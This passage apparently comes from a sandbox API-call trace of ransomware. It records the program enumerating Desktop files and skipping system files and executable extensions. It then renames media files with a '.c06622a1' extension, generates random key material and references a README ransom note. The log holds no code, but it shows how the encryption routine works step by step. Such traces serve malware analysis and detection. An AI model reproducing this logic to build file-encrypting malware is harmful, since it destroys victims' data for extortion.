_Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.319] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.320] wcscpy (in: _Dest=0x44d00cc, _Source="iwHN9FuwRsyWXuAnhp.mkv" | out: _Dest="iwHN9FuwRsyWXuAnhp.mkv") returned="iwHN9FuwRsyWXuAnhp.mkv" [0148.320] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iwHN9FuwRsyWXuAnhp.mkv", dwFileAttributes=0x80) returned 1 [0148.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iwHN9FuwRsyWXuAnhp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iwhn9fuwrsywxuanhp.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x628 [0148.320] SetFilePointerEx (in: hFile=0x628, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.320] ReadFile (in: hFile=0x628, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.321] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x95ae3446 [0148.321] RtlComputeCrc32 (PartialCrc=0x3446, Buffer=0x3feb74, Length=0x80) returned 0xcdbdc121 [0148.321] RtlComputeCrc32 (PartialCrc=0xc121, Buffer=0x3feb74, Length=0x80) returned 0x968090b0 [0148.321] RtlComputeCrc32 (PartialCrc=0x90b0, Buffer=0x3feb74, Length=0x80) returned 0x93f6b0b5 [0148.321] RtlComputeCrc32 (PartialCrc=0xb0b5, Buffer=0x3feb74, Length=0x80) returned 0x911fafd1 [0148.321] CloseHandle (hObject=0x628) returned 1 [0148.321] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.321] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iwHN9FuwRsyWXuAnhp.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iwHN9FuwRsyWXuAnhp.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iwHN9FuwRsyWXuAnhp.mkv" [0148.321] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iwHN9FuwRsyWXuAnhp.mkv") returned 0x40 [0148.321] wcscpy (in: _Dest=0x44e0100, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.321] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iwHN9FuwRsyWXuAnhp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iwhn9fuwrsywxuanhp.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iwHN9FuwRsyWXuAnhp.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iwhn9fuwrsywxuanhp.mkv.c06622a1"), dwFlags=0x8) returned 1 [0148.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iwHN9FuwRsyWXuAnhp.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iwhn9fuwrsywxuanhp.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x628 [0148.323] CreateIoCompletionPort (FileHandle=0x628, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.323] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4940020 [0148.328] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x184ae802 [0148.328] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a0592e2 [0148.328] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3e191f92 [0148.328] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xd413e2 [0148.328] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x44bd0142 [0148.328] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x71ad20e7 [0148.328] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7ecfe3a2 [0148.328] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6cdf16a0 [0148.331] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4940094, Length=0x80) returned 0x62a7a411 [0148.331] RtlComputeCrc32 (PartialCrc=0xa411, Buffer=0x4940094, Length=0x80) returned 0xe26191af [0148.331] RtlComputeCrc32 (PartialCrc=0x91af, Buffer=0x4940094, Length=0x80) returned 0xfd57c979 [0148.331] RtlComputeCrc32 (PartialCrc=0xc979, Buffer=0x4940094, Length=0x80) returned 0x4ed8e82b [0148.331] RtlComputeCrc32 (PartialCrc=0xe82b, Buffer=0x4940094, Length=0x80) returned 0x4d118616 [0148.331] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0148.331] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.331] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.331] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x163e57d0, ftCreationTime.dwHighDateTime=0x1d5dee1, ftLastAccessTime.dwLowDateTime=0xf4b49180, ftLastAccessTime.dwHighDateTime=0x1d5e069, ftLastWriteTime.dwLowDateTime=0xf4b49180, ftLastWriteTime.dwHighDateTime=0x1d5e069, nFileSizeHigh=0x0, nFileSizeLow=0xc2db, dwReserved0=0x0, dwReserved1=0x0, cFileName="KjeHSniXoIvD7SlnSDy.jpg", cAlternateFileName="KJEHSN~1.JPG")) returned 1 [0148.332] _wcsicmp (_Str1="KjeHSniXoIvD7SlnSDy.jpg", _Str2="README.c06622a1.TXT") returned -7 [0148.332] wcsstr (_Str="KjeHSniXoIvD7SlnSDy.jpg", _SubStr="README") returned 0x0 [0148.332] _wcsicmp (_Str1="autorun.inf", _Str2="KjeHSniXoIvD7SlnSDy.jpg") returned -10 [0148.332] wcslen (_String="autorun.inf") returned 0xb [0148.332] _wcsicmp (_Str1="boot.ini", _Str2="KjeHSniXoIvD7SlnSDy.jpg") returned -9 [0148.332] wcslen (_String="boot.ini") returned 0x8 [0148.332] _wcsicmp (_Str1="bootfont.bin", _Str2="KjeHSniXoIvD7SlnSDy.jpg") returned -9 [0148.332] wcslen (_String="bootfont.bin") returned 0xc [0148.332] _wcsicmp (_Str1="bootsect.bak", _Str2="KjeHSniXoIvD7SlnSDy.jpg") returned -9 [0148.332] wcslen (_String="bootsect.bak") returned 0xc [0148.332] _wcsicmp (_Str1="desktop.ini", _Str2="KjeHSniXoIvD7SlnSDy.jpg") returned -7 [0148.332] wcslen (_String="desktop.ini") returned 0xb [0148.332] _wcsicmp (_Str1="iconcache.db", _Str2="KjeHSniXoIvD7SlnSDy.jpg") returned -2 [0148.332] wcslen (_String="iconcache.db") returned 0xc [0148.332] _wcsicmp (_Str1="ntldr", _Str2="KjeHSniXoIvD7SlnSDy.jpg") returned 3 [0148.332] wcslen (_String="ntldr") returned 0x5 [0148.332] _wcsicmp (_Str1="ntuser.dat", _Str2="KjeHSniXoIvD7SlnSDy.jpg") returned 3 [0148.332] wcslen (_String="ntuser.dat") returned 0xa [0148.332] _wcsicmp (_Str1="ntuser.dat.log", _Str2="KjeHSniXoIvD7SlnSDy.jpg") returned 3 [0148.332] wcslen (_String="ntuser.dat.log") returned 0xe [0148.332] _wcsicmp (_Str1="ntuser.ini", _Str2="KjeHSniXoIvD7SlnSDy.jpg") returned 3 [0148.332] wcslen (_String="ntuser.ini") returned 0xa [0148.332] _wcsicmp (_Str1="thumbs.db", _Str2="KjeHSniXoIvD7SlnSDy.jpg") returned 9 [0148.332] wcslen (_String="thumbs.db") returned 0x9 [0148.332] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0148.332] wcslen (_String="386") returned 0x3 [0148.332] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0148.332] wcslen (_String="adv") returned 0x3 [0148.332] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0148.332] wcslen (_String="ani") returned 0x3 [0148.332] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0148.332] wcslen (_String="bat") returned 0x3 [0148.332] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0148.332] wcslen (_String="bin") returned 0x3 [0148.332] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0148.332] wcslen (_String="cab") returned 0x3 [0148.333] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0148.333] wcslen (_String="cmd") returned 0x3 [0148.333] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0148.333] wcslen (_String="com") returned 0x3 [0148.333] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0148.333] wcslen (_String="cpl") returned 0x3 [0148.333] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0148.333] wcslen (_String="cur") returned 0x3 [0148.333] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0148.333] wcslen (_String="deskthemepack") returned 0xd [0148.333] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0148.333] wcslen (_String="diagcab") returned 0x7 [0148.333] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0148.333] wcslen (_String="diagcfg") returned 0x7 [0148.333] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0148.333] wcslen (_String="diagpkg") returned 0x7 [0148.333] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0148.333] wcslen (_String="dll") returned 0x3 [0148.333] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0148.333] wcslen (_String="drv") returned 0x3 [0148.333] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0148.333] wcslen (_String="exe") returned 0x3 [0148.333] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0148.333] wcslen (_String="hlp") returned 0x3 [0148.333] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0148.333] wcslen (_String="icl") returned 0x3 [0148.333] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0148.333] wcslen (_String="icns") returned 0x4 [0148.333] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0148.333] wcslen (_String="ico") returned 0x3 [0148.333] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0148.333] wcslen (_String="ics") returned 0x3 [0148.333] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0148.333] wcslen (_String="idx") returned 0x3 [0148.333] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0148.333] wcslen (_String="ldf") returned 0x3 [0148.333] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0148.333] wcslen (_String="lnk") returned 0x3 [0148.334] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0148.334] wcslen (_String="mod") returned 0x3 [0148.334] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0148.334] wcslen (_String="mpa") returned 0x3 [0148.334] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0148.334] wcslen (_String="msc") returned 0x3 [0148.334] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0148.334] wcslen (_String="msp") returned 0x3 [0148.334] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0148.334] wcslen (_String="msstyles") returned 0x8 [0148.334] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0148.334] wcslen (_String="msu") returned 0x3 [0148.334] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0148.334] wcslen (_String="nls") returned 0x3 [0148.334] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0148.334] wcslen (_String="nomedia") returned 0x7 [0148.334] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0148.334] wcslen (_String="ocx") returned 0x3 [0148.334] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0148.334] wcslen (_String="prf") returned 0x3 [0148.334] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0148.334] wcslen (_String="ps1") returned 0x3 [0148.334] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0148.334] wcslen (_String="rom") returned 0x3 [0148.334] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0148.334] wcslen (_String="rtp") returned 0x3 [0148.334] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0148.334] wcslen (_String="scr") returned 0x3 [0148.334] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0148.334] wcslen (_String="shs") returned 0x3 [0148.334] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0148.334] wcslen (_String="spl") returned 0x3 [0148.334] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0148.334] wcslen (_String="sys") returned 0x3 [0148.334] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0148.334] wcslen (_String="theme") returned 0x5 [0148.334] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0148.334] wcslen (_String="themepack") returned 0x9 [0148.334] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0148.335] wcslen (_String="wpx") returned 0x3 [0148.335] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0148.335] wcslen (_String="lock") returned 0x4 [0148.335] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0148.335] wcslen (_String="key") returned 0x3 [0148.335] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0148.335] wcslen (_String="hta") returned 0x3 [0148.335] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0148.335] wcslen (_String="msi") returned 0x3 [0148.335] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0148.335] wcslen (_String="pdb") returned 0x3 [0148.335] _wcsicmp (_Str1="sql", _Str2="jpg") returned 9 [0148.335] wcslen (_String="sql") returned 0x3 [0148.335] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0148.335] wcslen (_String="sqlite") returned 0x6 [0148.335] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.335] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.335] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.335] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.335] wcscpy (in: _Dest=0x44d00cc, _Source="KjeHSniXoIvD7SlnSDy.jpg" | out: _Dest="KjeHSniXoIvD7SlnSDy.jpg") returned="KjeHSniXoIvD7SlnSDy.jpg" [0148.335] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KjeHSniXoIvD7SlnSDy.jpg", dwFileAttributes=0x80) returned 1 [0148.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KjeHSniXoIvD7SlnSDy.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kjehsnixoivd7slnsdy.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x624 [0148.335] SetFilePointerEx (in: hFile=0x624, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.336] ReadFile (in: hFile=0x624, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.337] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x2f6aa226 [0148.337] RtlComputeCrc32 (PartialCrc=0xa226, Buffer=0x3feb74, Length=0x80) returned 0x9d0fb13f [0148.337] RtlComputeCrc32 (PartialCrc=0xb13f, Buffer=0x3feb74, Length=0x80) returned 0x7929a5e2 [0148.337] RtlComputeCrc32 (PartialCrc=0xa5e2, Buffer=0x3feb74, Length=0x80) returned 0x79a7153 [0148.337] RtlComputeCrc32 (PartialCrc=0x7153, Buffer=0x3feb74, Length=0x80) returned 0xf4eea111 [0148.337] CloseHandle (hObject=0x624) returned 1 [0148.337] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.337] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KjeHSniXoIvD7SlnSDy.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KjeHSniXoIvD7SlnSDy.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KjeHSniXoIvD7SlnSDy.jpg" [0148.337] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KjeHSniXoIvD7SlnSDy.jpg") returned 0x41 [0148.337] wcscpy (in: _Dest=0x44e0102, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.337] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KjeHSniXoIvD7SlnSDy.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kjehsnixoivd7slnsdy.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KjeHSniXoIvD7SlnSDy.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kjehsnixoivd7slnsdy.jpg.c06622a1"), dwFlags=0x8) returned 1 [0148.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KjeHSniXoIvD7SlnSDy.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kjehsnixoivd7slnsdy.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x624 [0148.339] CreateIoCompletionPort (FileHandle=0x624, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.339] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x49d0020 [0148.345] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7590acb4 [0148.345] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4aa7f0d6 [0148.345] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x26a8d271 [0148.345] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x15a56694 [0148.345] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xe3b0440 [0148.345] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4f0d54d7 [0148.345] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x37ffc4b3 [0148.345] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1561fe4e [0148.348] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x49d0094, Length=0x80) returned 0x3603323d [0148.348] RtlComputeCrc32 (PartialCrc=0x323d, Buffer=0x49d0094, Length=0x80) returned 0xea88d01e [0148.348] RtlComputeCrc32 (PartialCrc=0xd01e, Buffer=0x49d0094, Length=0x80) returned 0x87d99fa8 [0148.348] RtlComputeCrc32 (PartialCrc=0x9fa8, Buffer=0x49d0094, Length=0x80) returned 0xf52a148e [0148.348] RtlComputeCrc32 (PartialCrc=0x148e, Buffer=0x49d0094, Length=0x80) returned 0x371fa4f7 [0148.348] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0148.348] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.348] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.348] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989dc3e0, ftCreationTime.dwHighDateTime=0x1d5d87f, ftLastAccessTime.dwLowDateTime=0xeaeca300, ftLastAccessTime.dwHighDateTime=0x1d5d99c, ftLastWriteTime.dwLowDateTime=0xeaeca300, ftLastWriteTime.dwHighDateTime=0x1d5d99c, nFileSizeHigh=0x0, nFileSizeLow=0x127a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="M9ZilojdIfYHk5ZHoL8Q.m4a", cAlternateFileName="M9ZILO~1.M4A")) returned 1 [0148.348] _wcsicmp (_Str1="M9ZilojdIfYHk5ZHoL8Q.m4a", _Str2="README.c06622a1.TXT") returned -5 [0148.348] wcsstr (_Str="M9ZilojdIfYHk5ZHoL8Q.m4a", _SubStr="README") returned 0x0 [0148.348] _wcsicmp (_Str1="autorun.inf", _Str2="M9ZilojdIfYHk5ZHoL8Q.m4a") returned -12 [0148.348] wcslen (_String="autorun.inf") returned 0xb [0148.348] _wcsicmp (_Str1="boot.ini", _Str2="M9ZilojdIfYHk5ZHoL8Q.m4a") returned -11 [0148.348] wcslen (_String="boot.ini") returned 0x8 [0148.348] _wcsicmp (_Str1="bootfont.bin", _Str2="M9ZilojdIfYHk5ZHoL8Q.m4a") returned -11 [0148.348] wcslen (_String="bootfont.bin") returned 0xc [0148.348] _wcsicmp (_Str1="bootsect.bak", _Str2="M9ZilojdIfYHk5ZHoL8Q.m4a") returned -11 [0148.348] wcslen (_String="bootsect.bak") returned 0xc [0148.348] _wcsicmp (_Str1="desktop.ini", _Str2="M9ZilojdIfYHk5ZHoL8Q.m4a") returned -9 [0148.349] wcslen (_String="desktop.ini") returned 0xb [0148.349] _wcsicmp (_Str1="iconcache.db", _Str2="M9ZilojdIfYHk5ZHoL8Q.m4a") returned -4 [0148.349] wcslen (_String="iconcache.db") returned 0xc [0148.349] _wcsicmp (_Str1="ntldr", _Str2="M9ZilojdIfYHk5ZHoL8Q.m4a") returned 1 [0148.349] wcslen (_String="ntldr") returned 0x5 [0148.349] _wcsicmp (_Str1="ntuser.dat", _Str2="M9ZilojdIfYHk5ZHoL8Q.m4a") returned 1 [0148.349] wcslen (_String="ntuser.dat") returned 0xa [0148.349] _wcsicmp (_Str1="ntuser.dat.log", _Str2="M9ZilojdIfYHk5ZHoL8Q.m4a") returned 1 [0148.349] wcslen (_String="ntuser.dat.log") returned 0xe [0148.349] _wcsicmp (_Str1="ntuser.ini", _Str2="M9ZilojdIfYHk5ZHoL8Q.m4a") returned 1 [0148.349] wcslen (_String="ntuser.ini") returned 0xa [0148.349] _wcsicmp (_Str1="thumbs.db", _Str2="M9ZilojdIfYHk5ZHoL8Q.m4a") returned 7 [0148.349] wcslen (_String="thumbs.db") returned 0x9 [0148.349] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0148.349] wcslen (_String="386") returned 0x3 [0148.349] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0148.349] wcslen (_String="adv") returned 0x3 [0148.349] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0148.349] wcslen (_String="ani") returned 0x3 [0148.349] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0148.349] wcslen (_String="bat") returned 0x3 [0148.349] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0148.349] wcslen (_String="bin") returned 0x3 [0148.349] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0148.349] wcslen (_String="cab") returned 0x3 [0148.349] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0148.349] wcslen (_String="cmd") returned 0x3 [0148.349] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0148.349] wcslen (_String="com") returned 0x3 [0148.349] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0148.349] wcslen (_String="cpl") returned 0x3 [0148.349] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0148.349] wcslen (_String="cur") returned 0x3 [0148.349] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0148.349] wcslen (_String="deskthemepack") returned 0xd [0148.349] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0148.349] wcslen (_String="diagcab") returned 0x7 [0148.350] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0148.350] wcslen (_String="diagcfg") returned 0x7 [0148.350] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0148.350] wcslen (_String="diagpkg") returned 0x7 [0148.350] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0148.350] wcslen (_String="dll") returned 0x3 [0148.350] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0148.350] wcslen (_String="drv") returned 0x3 [0148.350] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0148.350] wcslen (_String="exe") returned 0x3 [0148.350] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0148.350] wcslen (_String="hlp") returned 0x3 [0148.350] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0148.350] wcslen (_String="icl") returned 0x3 [0148.350] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0148.350] wcslen (_String="icns") returned 0x4 [0148.350] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0148.350] wcslen (_String="ico") returned 0x3 [0148.350] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0148.350] wcslen (_String="ics") returned 0x3 [0148.350] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0148.350] wcslen (_String="idx") returned 0x3 [0148.350] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0148.350] wcslen (_String="ldf") returned 0x3 [0148.350] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0148.350] wcslen (_String="lnk") returned 0x3 [0148.350] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0148.350] wcslen (_String="mod") returned 0x3 [0148.350] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0148.350] wcslen (_String="mpa") returned 0x3 [0148.350] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0148.350] wcslen (_String="msc") returned 0x3 [0148.350] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0148.350] wcslen (_String="msp") returned 0x3 [0148.350] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0148.350] wcslen (_String="msstyles") returned 0x8 [0148.350] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0148.350] wcslen (_String="msu") returned 0x3 [0148.351] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0148.351] wcslen (_String="nls") returned 0x3 [0148.351] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0148.351] wcslen (_String="nomedia") returned 0x7 [0148.351] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0148.351] wcslen (_String="ocx") returned 0x3 [0148.351] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0148.351] wcslen (_String="prf") returned 0x3 [0148.351] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0148.351] wcslen (_String="ps1") returned 0x3 [0148.351] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0148.351] wcslen 